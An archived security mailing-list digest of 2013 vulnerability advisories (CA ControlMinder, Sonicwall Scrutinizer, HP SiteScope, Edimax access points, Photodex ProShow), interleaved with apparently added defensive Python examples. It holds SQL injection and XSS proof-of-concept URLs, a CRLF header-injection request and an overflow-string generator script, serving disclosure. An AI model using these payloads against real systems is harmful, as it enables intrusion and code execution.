CA20130213-01: Security Notice for CA ControlMinder

2013-02-14 Thread Kotas, Kevin J
-----BEGIN PGP SIGNED MESSAGE-----

CA20130213-01: Security Notice for CA ControlMinder

Issued: February 13, 2013

CA Technologies Support is alerting customers to a potential risk
with CA ControlMinder. A vulnerability exists that can allow a remote
attacker to execute arbitrary code. CA has issued remediation to
address the vulnerability.

The vulnerability, CVE-2010-0738, occurs due to the default JBoss
Application Server configuration not correctly enforcing
authentication. A remote attacker can bypass authentication, which
may result in arbitrary code execution and server compromise. This
vulnerability only affects the server components.

Risk Rating

High

Platform

Windows
Linux
Solaris

Affected Products

CA ControlMinder for Windows 12.5, 12.6 (formerly CA Access Control)
CA ControlMinder for Linux 12.5, 12.6
CA ControlMinder SAM 12.5, 12.6
CA ControlMinder Upgrade
CA ControlMinder for Virtual Environments 2.0

Non-Affected Products

CA ControlMinder for Windows 12.6 SP1
CA ControlMinder for Linux 12.6 SP1
CA ControlMinder SAM 12.6 SP1
CA ControlMinder Upgrade 12.6 SP1
CA ControlMinder for Virtual Environments 2.0 CR

How to determine if the installation is affected

If the installed version is prior to the version indicated in the
Solution section, the installation may be vulnerable. To manually
confirm whether the installation is vulnerable, use the following
instructions:

1. Using a web browser, open the following location, where "location"
is the server name or IP address of the ControlMinder installation:

http://location:18080/jmx-console

2. If the webpage is accessible, then the installation is vulnerable.
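The two-step browser check above, written up as a small Python audit script (an added example, not CA's tooling and not the procedure in TEC559568). It issues the same GET to port 18080 that the notice asks an administrator to make and reports whether /jmx-console answers without asking for credentials. The port and path come from the notice; the interpretation of 401/403 as "protected" and 404 as "servlet removed" is an assumption, and the embedded stand-in server is constructed so the script can be exercised offline.

```python
#!/usr/bin/env python3
"""Audit check for an exposed JBoss jmx-console (added example).

Assumptions: the console is served at http://<host>:18080/jmx-console; a
hardened server answers 401/403 (or 404 once the servlet is disabled).
"""
import http.client
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer

JMX_PATH = "/jmx-console/"
DEFAULT_PORT = 18080          # port named in the CA notice


def classify(status):
    """Map the HTTP status of GET /jmx-console to an audit verdict."""
    if status == 200:
        return "VULNERABLE: jmx-console reachable without authentication"
    if status in (401, 403):
        return "PROTECTED: jmx-console requires authentication"
    if status == 404:
        return "NOT PRESENT: jmx-console servlet disabled or removed"
    return "UNKNOWN: HTTP %d, inspect manually" % status


def check_jmx_console(host, port=DEFAULT_PORT, timeout=5.0):
    """Issue the GET the notice tells administrators to make in a browser."""
    conn = http.client.HTTPConnection(host, port, timeout=timeout)
    try:
        conn.request("GET", JMX_PATH)
        resp = conn.getresponse()
        return resp.status, classify(resp.status)
    finally:
        conn.close()


# --- constructed stand-in for a JBoss instance so the check runs offline ---
class _FakeJBoss(BaseHTTPRequestHandler):
    """Answers /jmx-console with 200 (default config) or 401 (hardened)."""

    def do_GET(self):
        if self.path.startswith("/jmx-console"):
            if self.server.authenticated:
                self.send_response(401)
                self.send_header("WWW-Authenticate",
                                 'Basic realm="JBoss JMX Console"')
            else:
                self.send_response(200)
            self.send_header("Content-Type", "text/html")
            self.end_headers()
        else:
            self.send_response(404)
            self.end_headers()

    def log_message(self, *args):   # keep the demo output quiet
        pass


def serve_fake(authenticated):
    """Start a throwaway server on an ephemeral port; returns (server, port)."""
    srv = HTTPServer(("127.0.0.1", 0), _FakeJBoss)
    srv.authenticated = authenticated
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv, srv.server_address[1]


def demo():
    """Run the check against a default-config and a hardened stand-in."""
    results = {}
    for label, auth in (("default-config", False), ("hardened", True)):
        srv, port = serve_fake(auth)
        try:
            status, verdict = check_jmx_console("127.0.0.1", port)
        finally:
            srv.shutdown()
            srv.server_close()
        results[label] = status
        print("%-15s -> %s" % (label, verdict))
    return results


if __name__ == "__main__":
    demo()
```

Against a real installation call check_jmx_console("server-name") and act on the verdict; a 200 is exactly the "webpage is accessible" condition the notice describes as vulnerable.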

Solution

CA Technologies has issued the following remediation to address the
vulnerability.

All updates are available through the Download Center on the CA
Technologies support website.

For CA ControlMinder on all platforms, update as follows:

CA ControlMinder for Windows 12.6:
CA ControlMinder Premium Edition 12.6 SP1 Server Components for
Windows
DVD06135111E.iso

CA ControlMinder for Linux 12.6:
CA ControlMinder Premium Edition 12.6 SP1 Server Components for Linux
DVD06134958E.iso

CA ControlMinder SAM 12.6:
CA ControlMinder Premium Edition 12.6 SP1 Server Components for Linux
DVD06134958E.iso

CA ControlMinder Upgrade 12.6:
CA ControlMinder Premium Edition 12.6 SP1 Server Components for Linux
DVD06134958E.iso

CA ControlMinder for Virtual Environments 2.0:
Access Control for Virtual Environments 2.0 CR
DVD01091214E.iso

CA ControlMinder 12.5 all releases on all platforms:
Disable the JMX and Web Console servlets as described in TEC559568.

Workaround

Alternatively, the JMX and Web Console servlets may be disabled to
remediate the vulnerability. See TEC559568 for instructions.

References

CVE-2010-0738

CA20130213-01: Security Notice for CA ControlMinder
https://support.ca.com/irj/portal/anonymous/phpsbpldgpg

Acknowledgement

Sanehdeep Singh, Jainam Technologies Pvt. Ltd.

Change History

Version 1.0: Initial Release

If additional information is required, please contact CA Technologies
Support at http://support.ca.com/

If you discover a vulnerability in CA Technologies products, please
report your findings to the CA Technologies Product Vulnerability
Response Team:
https://support.ca.com/irj/portal/anonymous/phpsbpldgpg

Regards,

Kevin Kotas
Director, CA Technologies Product Vulnerability Response Team

Copyright (c) 2013 CA. All Rights Reserved. One CA Plaza, Islandia,
N.Y. 11749. All other trademarks, trade names, service marks, and
logos referenced herein belong to their respective companies.

-----BEGIN PGP SIGNATURE-----
Version: PGP Desktop 10.2.1 (Build 4940)
Charset: utf-8

wsBVAwUBURvYMZI1FvIeMomJAQFa8QgAlGvNxaK3QWCw9z/Uzv7Jty4NAnZQ7V5n
44ZxK6sP4WN9gXklOYm9srnNCH65GdFNI6siqEi6SGeyzEww57V7mKUoZgdipQDn
+CuRvj2ExtxZhWXSYkTW6aW0QYq5/wTT/SIcYwgfvyMWqajb5LM0dJXvFboTs05l
pTjpl+Z+JudGB7ShlpQEVUrdTBmH3doYwIIoWNzUk+SjJq8d8sgh9PqLda+DrALt
Njzsw+VKmG1usidHNJnvATMKNsJwQ2hxRQF0SbtvJsTd99ZetLbbdu1qun3fdmf1
Hbug/loFo6iBRwIkcLC3z87ph9cM0J6GsWa8rMzItmOZcGiu1rdd0A==
=DZV/
-----END PGP SIGNATURE-----


Sonicwall Scrutinizer v9.5.2 - SQL Injection Vulnerability

2013-02-14 Thread Vulnerability Lab
Title:
==
Sonicwall Scrutinizer v9.5.2 - SQL Injection Vulnerability


Date:
=
2013-02-13


References:
===
http://www.vulnerability-lab.com/get_content.php?id=789

#9984: Investigate Vulnerability Lab issues (this ticket included tracking the 
creation of our DBI shim to error on semi-colon)
#10149: Create a common function to escape characters that can be used for SQL 
injection
#10139: Review all mapping and flow analytics queries to make sure inputs 
included in SQL are escaped
#10141: Review all reporting and filtering queries to make sure inputs included 
in SQL are escaped
#10140: Review all alarm tab and admin tab queries to make sure inputs included 
in SQL are escaped


VL-ID:
=
789


Common Vulnerability Scoring System:

7.3


Introduction:
=
Dell SonicWALL Scrutinizer is a multi-vendor, flow-based application traffic 
analytics, visualization and reporting tool 
to measure and troubleshoot network performance and utilization while 
increasing productivity for enterprises and service providers. 
Scrutinizer supports a wide range of routers, switches, firewalls, and 
data-flow reporting protocols, providing unparalleled insight 
into application traffic analysis from IPFIX/NetFlow data exported by Dell 
SonicWALL firewalls, as well as support for a wide range 
of routers, switches, firewalls, and data-flow reporting protocols. IT 
administrators in charge of high throughput networks can 
deploy Scrutinizer as a virtual appliance for high performance environments. 

(Copy of the Vendor Homepage: 
http://www.sonicwall.com/us/en/products/Scrutinizer.html )



Abstract:
=
The Vulnerability Laboratory Research Team discovered a SQL Injection 
vulnerability in the Dell Sonicwall OEM Scrutinizer v9.5.2 appliance 
application.


Report-Timeline:

2012-12-05: Researcher Notification & Coordination
2012-12-07: Vendor Notification
2013-01-08: Vendor Response/Feedback
2013-02-10: Vendor Fix/Patch
2013-02-11: Public Disclosure


Status:

Published


Affected Products:
==
DELL
Product: Sonicwall OEM Scrutinizer 9.5.2


Exploitation-Technique:
===
Remote


Severity:
=
High


Details:

A blind SQL Injection vulnerability is detected in the Sonicwall OEM 
Scrutinizer v9.5.2 appliance application.
The bug allows remote attackers to execute/inject their own SQL statements/commands to 
manipulate the affected vulnerable application DBMS.
The SQL injection vulnerability is located in the fa_web.cgi file within the 
bound gadget listing module and the vulnerable orderby or 
gadget parameters. Exploitation requires no user interaction & no 
privileged application user account. Successful exploitation of 
the remote SQL vulnerability results in DBMS & application compromise. 

Vulnerable File(s):
[+] fa_web.cgi

Vulnerable Module(s):
[+] gadget listing

Vulnerable Parameter(s):
[+] orderby
[+] gadget


Proof of Concept:
=
The remote SQL injection vulnerability can be exploited by remote attackers 
without a privileged application user account 
and also without user interaction. For demonstration or to reproduce ...

PoC:
http://127.0.0.1:1339/cgi-bin/fa_web.cgi?gadget=applicationsbytes-1%27[SQL INJECTION VULNERABILITY!]&orderby=1&cachebreaker=23_52_5_814-1%27
http://127.0.0.1:1339/cgi-bin/fa_web.cgi?gadget=applicationsbytes&orderby=-1%27[SQL INJECTION VULNERABILITY!]&cachebreaker=23_52_5_814-1%27



Solution:
=
1) The Scrutinizer team created their own DB layer that will die if a semicolon is 
found within a SQL query.
2) We have changed more queries to pass inputs as bound variables to the DB 
engine, which prevents possible SQL injection.
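The two fixes listed above, shown side by side with the vulnerable pattern in a Python/sqlite3 stand-in (an added example; Scrutinizer's fa_web.cgi and its DBI layer are not shown on the page, and the gadget table schema here is constructed). It also shows the caveat that matters for this advisory's parameters: a value such as gadget can be passed as a bound variable, but ORDER BY takes a column name, which no DB engine accepts as a bound variable, so orderby has to be mapped through an allowlist. Finally it shows why the semicolon guard (fix 1) is only a backstop: the advisory's probe uses a single quote, not a semicolon, and the guard lets it through.

```python
import sqlite3


def make_db():
    """Constructed stand-in for the gadget table (schema is an assumption)."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE gadgets (id INTEGER PRIMARY KEY, name TEXT,
                              bytes INTEGER, hits INTEGER);
        INSERT INTO gadgets VALUES (1, 'applicationsbytes', 500, 3);
        INSERT INTO gadgets VALUES (2, 'topflows', 900, 1);
        INSERT INTO gadgets VALUES (3, 'hosts', 100, 9);
    """)
    return db


def die_on_semicolon(sql):
    """Fix 1 from the advisory: a DB-layer guard against stacked statements."""
    if ";" in sql:
        raise RuntimeError("semicolon in SQL, refusing to run: %r" % sql)
    return sql


def list_gadgets_vulnerable(db, gadget, orderby):
    """The pattern behind the advisory: request parameters pasted into SQL.
    The semicolon guard is in front, yet a quote in `gadget` (the -1%27
    probe from the PoC) still alters the statement."""
    sql = ("SELECT id, name, bytes FROM gadgets WHERE name = '%s' ORDER BY %s"
           % (gadget, orderby))
    return db.execute(die_on_semicolon(sql)).fetchall()


# ORDER BY takes an identifier, which cannot be a bound variable, so the
# `orderby` parameter is mapped through an allowlist of sortable columns
# (the set below belongs to the constructed table, not to Scrutinizer).
ORDERBY_ALLOWED = {"1": "id", "name": "name", "bytes": "bytes", "hits": "hits"}


def list_gadgets_safe(db, gadget, orderby):
    """Fix 2 from the advisory: values as bound variables, identifiers via allowlist."""
    column = ORDERBY_ALLOWED.get(orderby)
    if column is None:
        raise ValueError("orderby %r is not a sortable column" % orderby)
    sql = "SELECT id, name, bytes FROM gadgets WHERE name = ? ORDER BY " + column
    return db.execute(die_on_semicolon(sql), (gadget,)).fetchall()


def outcome(fn, db, gadget, orderby):
    """Summarise one request: ('ok', rows), ('rejected', 0) or ('sql-error', 0).
    A 'sql-error' on the vulnerable path is the error-based signal a blind
    injection probe looks for; the safe path never produces it from input."""
    try:
        return ("ok", len(fn(db, gadget, orderby)))
    except ValueError:
        return ("rejected", 0)
    except (sqlite3.Error, RuntimeError):
        return ("sql-error", 0)


if __name__ == "__main__":
    db = make_db()
    for fn in (list_gadgets_vulnerable, list_gadgets_safe):
        print(fn.__name__)
        print("  normal request   ", outcome(fn, db, "applicationsbytes", "bytes"))
        print("  quote in gadget  ", outcome(fn, db, "applicationsbytes-1'", "1"))
        print("  quote in orderby ", outcome(fn, db, "applicationsbytes", "-1'"))
```

Running it shows the vulnerable function returning a SQL error for both probe values while the safe function returns an empty result for the quoted gadget name and a plain rejection for the quoted orderby, with no statement ever reaching the engine.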


Risk:
=
The security risk of the remote sql injection vulnerability is estimated as 
high(+).


Credits:

Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri 
(b...@vulnerability-lab.com)


Disclaimer:
===
The information provided in this advisory is provided as it is without any 
warranty. Vulnerability-Lab disclaims all warranties, 
either expressed or implied, including the warranties of merchantability and 
capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, 
indirect, incidental, consequential loss of business 
profits or special damages, even if Vulnerability-Lab or its suppliers have 
been advised of the possibility of such damages. Some 
states do not allow the exclusion or limitation of liability for consequential 
or incidental damages so the foregoing limitation 
may not apply. We do not approve or encourage anybody to break any vendor 
licenses, policies, deface websites, hack into databases 
or trade with fraud/stolen material.

Domains: www.vulnerability-lab.com

Re: Aastra IP Telephone encrypted .tuz configuration file leakage

2013-02-14 Thread noreply
Vulnerability fixed in the August 2012 release of the anacrypt V1.04 encryption tool.  
Available on the www.aastra.com website.

IP Phone Configuration File Encryption Tool - Microsoft Windows (Version 1.04, 
08/2012, gz) (English, 45.78 KB) 

IP Phone Configuration File Encryption Tool - Linux 32 bit (Version 1.04, 
08/2012, gz) (English, 9.18 KB) 

IP Phone Configuration File Encryption Tool - Linux 64 bit (Version 1.04, 
08/2012, gz) (English, 9.89 KB) 


[security bulletin] HPSBMU02815 SSRT100715 rev.5 - HP SiteScope SOAP Security Issues, Remote Disclosure of Information, Remote Code Execution

2013-02-14 Thread security-alert
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Note: the current version of the following document is available here:
https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c03489683

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c03489683
Version: 5

HPSBMU02815 SSRT100715 rev.5 - HP SiteScope SOAP Security Issues, Remote
Disclosure of Information, Remote Code Execution

NOTICE: The information in this Security Bulletin should be acted upon as
soon as possible.

Release Date: 2013-02-13
Last Updated: 2013-02-13

Potential Security Impact: Remote disclosure of information, remote code
execution

Source: Hewlett-Packard Company, HP Software Security Response Team

VULNERABILITY SUMMARY
Potential security vulnerabilities have been identified with HP SiteScope.
The vulnerabilities in SiteScope SOAP features could be remotely exploited to
allow disclosure of information or code execution.

References: CVE-2012-3259, ZDI-CAN-1461, SSRT100715
            CVE-2012-3260, ZDI-CAN-1462, SSRT100716
            CVE-2012-3261, ZDI-CAN-1463, SSRT100717
            CVE-2012-3262, ZDI-CAN-1464, SSRT100718
            CVE-2012-3263, ZDI-CAN-1465, SSRT100719
            CVE-2012-3264, ZDI-CAN-1472, SSRT100720

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
HP SiteScope v10.14, v11.10, v11.11, v11.12, v11.20, for Windows, Linux and
Solaris

BACKGROUND

CVSS 2.0 Base Metrics
===========================================================
  Reference              Base Vector                  Base Score
  CVE-2012-3259          (AV:N/AC:L/Au:N/C:C/I:C/A:C)     10.0
  CVE-2012-3260          (AV:N/AC:L/Au:N/C:C/I:C/A:C)     10.0
  CVE-2012-3261          (AV:N/AC:L/Au:N/C:C/I:C/A:C)     10.0
  CVE-2012-3262          (AV:N/AC:L/Au:N/C:C/I:C/A:C)     10.0
  CVE-2012-3263          (AV:N/AC:L/Au:N/C:C/I:C/A:C)     10.0
  CVE-2012-3264          (AV:N/AC:L/Au:N/C:C/I:C/A:C)     10.0
===========================================================
  Information on CVSS is documented
  in HP Customer Notice: HPSN-2008-002

The Hewlett-Packard Company thanks Andrea Micalizzi aka rgod for working with
the TippingPoint Zero Day Initiative to report these vulnerabilities to
security-al...@hp.com

RESOLUTION

HP has provided SiteScope update v11.13 to update HP SiteScope v11.10 to
enable a resolution of this issue.

HP has provided patches to v11.20 to enable a resolution of this issue.

HP has provided patches to v10.14 to enable a resolution to this issue.

This issue is resolved in SiteScope v11.21.

Obtain SiteScope update v11.13 from HP Software Support Online at
http://support.openview.hp.com/downloads.jsp .

Obtain SiteScope patches for v11.20 from HP Software Support Online at
http://support.openview.hp.com/downloads.jsp .

SiteScope v11.20
  Platform                   Patch Document
  Windows 32 and 64 bit      KM00208435 SIS_00231 SiS 11.20 32 and 64-bit cumulative patch
  Windows 32 bit on 64 bit   KM00208434 SIS_00232 SiS 11.20 32-bit on 64-bit OS cumulative patch
  Linux                      KM00208433 SIS_00233 SiS 11.20 cumulative
  Solaris                    KM00208432 SIS_00234 SiS 11.20 cumulative patch

SiteScope v10.14
  Platform                   Patch Document
  Windows 2003, 2008         KM00310020 sis 10.14 cumulative patch
  Linux                      KM00310011 sis10.14 cumulative patch
  Solaris                    KM00310971 sis 10.14 cumulative patch

Note: to prevent the vulnerability after applying the update, an administrator
must disable the vulnerable SOAP API by adding the _disableOldAPIs=true
property to the master.config file. However, for application compatibility
purposes, the default property is set to false to support integrations with
old versions of BSM/BAC, which disables the security protection.
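Because the patch alone leaves the old SOAP API enabled, the _disableOldAPIs setting is the thing to verify on every patched SiteScope host. The following is an added example (not HP tooling) of a small config audit for that property: it parses master.config, reports the finding when the property is missing or false, and can emit the corrected text. The only property name it relies on is _disableOldAPIs, which the bulletin gives; treating master.config as a line-oriented key=value file with # comments is an assumption, and the sample config is constructed.

```python
"""Audit the _disableOldAPIs property in a SiteScope master.config (added example)."""

# Constructed excerpt; the other keys are placeholders, not real SiteScope settings.
SAMPLE_MASTER_CONFIG = """\
# constructed master.config excerpt (not a real SiteScope file)
exampleSettingA=1
_disableOldAPIs=false
exampleSettingB=value
"""

PROPERTY = "_disableOldAPIs"


def parse_master_config(text):
    """Parse key=value lines; assumption: '#' starts a comment line."""
    props = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        key, sep, value = line.partition("=")
        if sep:
            props[key.strip()] = value.strip()
    return props


def old_apis_disabled(props):
    """True only when the property is explicitly 'true'; absent means the
    insecure default the bulletin describes (false)."""
    return props.get(PROPERTY, "false").strip().lower() == "true"


def audit(text):
    """One-line verdict for a master.config body."""
    props = parse_master_config(text)
    if old_apis_disabled(props):
        return "OK: legacy SOAP API disabled (%s=true)" % PROPERTY
    return ("FINDING: %s is %s; the patched SiteScope still serves the old SOAP API"
            % (PROPERTY, props.get(PROPERTY, "unset")))


def set_disable_old_apis(text):
    """Return the config text with the property forced to true (replace or append)."""
    out, found = [], False
    for raw in text.splitlines():
        key = raw.split("=", 1)[0].strip()
        if key == PROPERTY and not raw.lstrip().startswith("#"):
            out.append("%s=true" % PROPERTY)
            found = True
        else:
            out.append(raw)
    if not found:
        out.append("%s=true" % PROPERTY)
    return "\n".join(out) + "\n"


if __name__ == "__main__":
    print(audit(SAMPLE_MASTER_CONFIG))
    print(audit(set_disable_old_apis(SAMPLE_MASTER_CONFIG)))
```

Point the script at the real file (read it into `text`) on each v11.13/v11.20/v10.14 host after patching; the bulletin's own caveat is that the property may have to stay false where old BSM/BAC integrations are still in use, so a FINDING there is a documented risk acceptance rather than a missed step.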

HISTORY
Version:1 (rev.1) - 19 September 2012 Initial release
Version:2 (rev.2) - 19 September 2012 updated reference section
Version:3 (rev.3) - 20 September 2012 updated Supported Software Versions
section
Version:4 (rev.4) - 31 October 2012 updated Supported Software Versions
section
Version:5 (rev.5) - 13 February 2013 updated Supported Software Versions
section

Third Party Security Patches: Third party security patches that are to be
installed on systems running HP software products should be applied in
accordance with the customer's patch management policy.

Support: For issues about implementing the recommendations of this Security
Bulletin, contact normal HP Services support channel.  For other issues about
the content of this Security Bulletin, send e-mail to security-al...@hp.com.

Report: To report a potential security vulnerability with any HP supported
product, send Email to: security-al...@hp.com

Subscribe: To initiate a subscription to receive future HP Security Bulletin
alerts via Email:
http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins

Security Bulletin List: A list of HP Security Bulletins, updated
periodically, is contained in HP Security Notice HPSN-2011-001:
https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c02964430

Security Bulletin Archive: A list of recently released Security 

Multiple Vulnerabilities in Edimax EW-7206-APg and EW-7209APg

2013-02-14 Thread devnull
Device Name: EW-7206APg / EW-7209APg
Vendor: Edimax

Vulnerable Firmware Releases:

Device: EW-7206APg
 Hardware Version   Rev. A
 Runtime Code Version   v1.32 
 Runtime Code Version   V1.33

Device: EW-7209APg
 Hardware Version   Rev. A
 Runtime Code Version   1.21 
 Runtime Code Version   1.29 

Device Description:

Acting as a bridge between the wired Ethernet and the 2.4GHz IEEE 802.11g/b 
wireless LAN, this wireless LAN access point can let your wireless LAN client 
stations access both the wired and the wireless network nodes.

EW-7206APg: 
http://www.edimax.com/en/produce_detail.php?pl1_id=25&pl2_id=134&pl3_id=359&pd_id=18
EW-7209APg: http://www.edimax-de.eu/de/support_detail.php?pd_id=18&pl1_id=1

Vulnerability Overview:

* URL Redirection: 
Parameter:  submit-url and wlan-url

http://192.168.178.175/goform/formWirelessTbl?submit-url=http://www.google.de

http://192.168.178.175/goform/formWlanSetup?apMode=0&band=2&ssid=test&chan=11&macAddrValue=5C260A2BF03F&wlanMacClone=0&wlanMac=&autoMacClone=no&repeaterSSID=&wlLinkMac1=&wlLinkMac2=&wlLinkMac3=&wlLinkMac4=&wlLinkMac5=&wlLinkMac6=&x=57&y=20&wlan-url=http://www.pwnd.pwnd

* reflected XSS:
Parameter:  submit-url and wlan-url

Injecting scripts into the parameter submit-url or wlan-url reveals that this 
parameter is not properly validated for malicious input.

Example Exploit:
http://192.168.178.175/goform/formWlanSetup?apMode=0&band=2&ssid=&chan=11&macAddrValue=&wlanMacClone=0&wlanMac=&autoMacClone=no&repeaterSSID=&wlLinkMac1=&wlLinkMac2=&wlLinkMac3=&wlLinkMac4=&wlLinkMac5=&wlLinkMac6=&x=54&y=12&wlan-url=test<script>alert('XSSed')</script>test

* stored XSS 

* in System Utility - Domain Name:
= parameter: DomainName

Injecting scripts into the parameter DomainName reveals that this parameter is 
not properly validated for malicious input. You need to be authenticated or you 
have to find other methods for inserting the malicious JavaScript code.

http://192.168.178.175/goform/formTcpipSetup?oldpass=&newpass=&confpass=&ip=192.168.178.175&mask=255.255.255.0&gateway=0.0.0.0&dhcp=2&DhcpGatewayIP=0.0.0.0&DhcpNameServerIP=0.0.0.0&dhcpRangeStart=192.168.178.100&dhcpRangeEnd=192.168.178.200&DomainName=;<script>alert(2)</script>&leaseTimeGet=94608&leaseTime=94608&B1.x=52&B1.y=21&submit-url=%2Fsysutility.asp&ipChanged=

* Stored XSS in wireless settings / basic settings - ESSID
- The injected script code gets executed within the device information

Injecting scripts into the parameter ssid reveals that this parameter is not 
properly validated for malicious input. You need to be authenticated or you 
have to find other methods for inserting the malicious JavaScript code.

Example Request:
POST /goform/formWlanSetup HTTP/1.1
Host: 192.168.178.175
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:14.0) Gecko/20100101 
Firefox/14.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Referer: http://192.168.178.175/wlbasic.asp
Authorization: Basic xxx
Content-Type: application/x-www-form-urlencoded
Content-Length: 351

apMode=0&band=2&ssid=%22%3E%3Cimg+src%3D%220%22+onerror%3Dalert%281%29%3E&chan=11&macAddrValue=5C260A2BF03F&wlanMacClone=0&wlanMac=&autoMacClone=no&repeaterSSID=&wlLinkMac1=&wlLinkMac2=&wlLinkMac3=&wlLinkMac4=&wlLinkMac5=&wlLinkMac6=&x=50&y=20&wlan-url=%2Fwlbasic.asp

* HTTP Header Injection:

Parameter: submit-url

Injecting code into the parameter submit-url reveals that this parameter 
is not properly validated for malicious input, so it is possible to 
manipulate the header information.

http://192.168.178.175/goform/formWirelessTbl?submit-url=e82f5%0d%0aNew%20Header:%20PWND

Response:
HTTP/1.0 302 Redirect
Server: GoAhead-Webs
Date: Sat Jan  1 14:06:23 2000
Pragma: no-cache
Cache-Control: no-cache
Content-Type: text/html
Location: http://192.168.178.175/e82f5
New Header: PWND
snip
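The redirect, header-injection and XSS findings above share one root cause: the form handlers copy submit-url, wlan-url, ssid and DomainName from the request straight into a Location header or into a page. As an added example (not Edimax or GoAhead code), here is server-side handling in Python that would close all three at once: the redirect value is accepted only as a local path with no CR/LF, and stored values are HTML-escaped at output time. The device address and the decoded payloads are the ones from the advisory; the default landing page, the 32-octet SSID limit and the page layout are assumptions.

```python
import html
from urllib.parse import urlsplit

DEVICE_BASE = "http://192.168.178.175"   # address used in the advisory
DEFAULT_PAGE = "/index.asp"              # assumed landing page after a submit
MAX_SSID_OCTETS = 32                     # 802.11 SSID length limit


def safe_redirect_target(value, default=DEFAULT_PAGE):
    """Accept only a local absolute path for the post-submit redirect.
    Rejects CR/LF/NUL (the %0d%0a header injection) and anything carrying a
    scheme or host, including scheme-relative //host (the open redirect)."""
    if not value or any(ch in value for ch in "\r\n\0"):
        return default
    parts = urlsplit(value)
    if parts.scheme or parts.netloc or not value.startswith("/"):
        return default
    return value


def redirect_headers(submit_url):
    """Headers a form handler would emit after a successful update.
    The check runs on the URL-decoded value, which is where %0d%0a has
    already turned back into a raw CRLF."""
    return [("Location", DEVICE_BASE + safe_redirect_target(submit_url))]


def validate_ssid(ssid):
    """Length check on input; content is still escaped on output below."""
    if not 1 <= len(ssid.encode("utf-8")) <= MAX_SSID_OCTETS:
        raise ValueError("SSID must be 1-%d octets" % MAX_SSID_OCTETS)
    return ssid


def render_device_info(ssid, domain_name):
    """Device-information fragment: stored values are escaped when rendered,
    so the stored XSS payloads become inert text."""
    return ("<tr><td>ESSID</td><td>%s</td></tr>"
            "<tr><td>Domain Name</td><td>%s</td></tr>"
            % (html.escape(ssid, quote=True), html.escape(domain_name, quote=True)))


if __name__ == "__main__":
    for v in ("http://www.google.de", "//www.pwnd.pwnd/", "e82f5\r\nNew Header: PWND",
              "/sysutility.asp"):
        print(repr(v), "->", redirect_headers(v))
    print(render_device_info('"><img src="0" onerror=alert(1)>', ';<script>alert(2)</script>'))
```

The header-injection case is the one to watch in the test: the CRLF value must not merely lose the injected header, it must never be placed in a header at all, which is why the function falls back to a fixed default instead of trying to strip characters.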

Solution

No known solution available.

Credits

The vulnerability was discovered by Michael Messner
Mail: devnull#at#s3cur1ty#dot#de
Web: http://www.s3cur1ty.de
Advisory URL: http://www.s3cur1ty.de/m1adv2013-009
Twitter: @s3cur1ty_de

Time Line:

September 2012 - discovered vulnerability
21.09.2012 - contacted vendor with vulnerability details
24.09.2012 - vendor responded that they will not provide a fix
14.02.2013 - public disclosure

= Advisory end =


[IA46] Photodex ProShow Producer v5.0.3297 ColorPickerProc() Memory Corruption

2013-02-14 Thread Inshell Security
Inshell Security Advisory
http://www.inshell.net


1. ADVISORY INFORMATION
-----------------------
Product:        Photodex ProShow Producer
Vendor URL:     www.photodex.com
Type:           Improper Restriction of Operations within the Bounds
                of a Memory Buffer [CWE-119]
Date found:     2013-02-14
Date published: 2013-02-14
CVSSv2 Score:   4,4 (AV:L/AC:M/Au:N/C:P/I:P/A:P)
CVE:            -


2. CREDITS
--
This vulnerability was discovered and researched by Julien Ahrens from
Inshell Security.


3. VERSIONS AFFECTED

Photodex ProShow Producer v5.0.3297, older versions may be affected too.


4. VULNERABILITY DESCRIPTION

A memory corruption vulnerability has been identified in Photodex
ProShow Producer v5.0.3297.

When opening a crafted style file (.pxs), the application loads the
title value from the pxs file.

The ColorPickerProc function does not properly validate the length of
the string loaded from the title value from the pxs file before using
it in the further application context, which leads to a memory
corruption condition with possible code execution depending on the
version of the operating system.

Vulnerable function definition (all.dnt):
 __stdcall ColorPickerProc(x, x, x, x)

An attacker needs to force the victim to open a crafted .pxs file in
order to exploit the vulnerability. Successful exploits can allow
attackers to execute arbitrary code with the privileges of the user
running the application. Failed exploits will result in
denial-of-service conditions.


5. PROOF-OF-CONCEPT (Code / Exploit)

The following generated string has to be inserted into a .pxs file to
trigger the vulnerability on Windows XP SP3.

#!/usr/bin/python
# Writes the crafted title value described above to poc.txt
file = "poc.txt"

junk1 = "\x41" * 233   # filler up to the overwritten return address
eip = "\x42" * 4       # the four bytes that land in EIP on Windows XP SP3
junk2 = "\xCC" * 100   # trailing padding

poc = junk1 + eip + junk2

try:
    print("[*] Creating exploit file...\n")
    writeFile = open(file, "w")
    writeFile.write(poc)
    writeFile.close()
    print("[*] File successfully created!")
except:
    print("[!] Error while creating file!")


For further Screenshots and/or PoCs visit:
http://security.inshell.net/advisory/46


6. SOLUTION
---
None


7. REPORT TIMELINE
--
2013-02-14: Discovery of the vulnerability
2013-02-14: Full Disclosure because the vendor ignored all previous
reports.


8. REFERENCES
-
http://security.inshell.net/advisory/46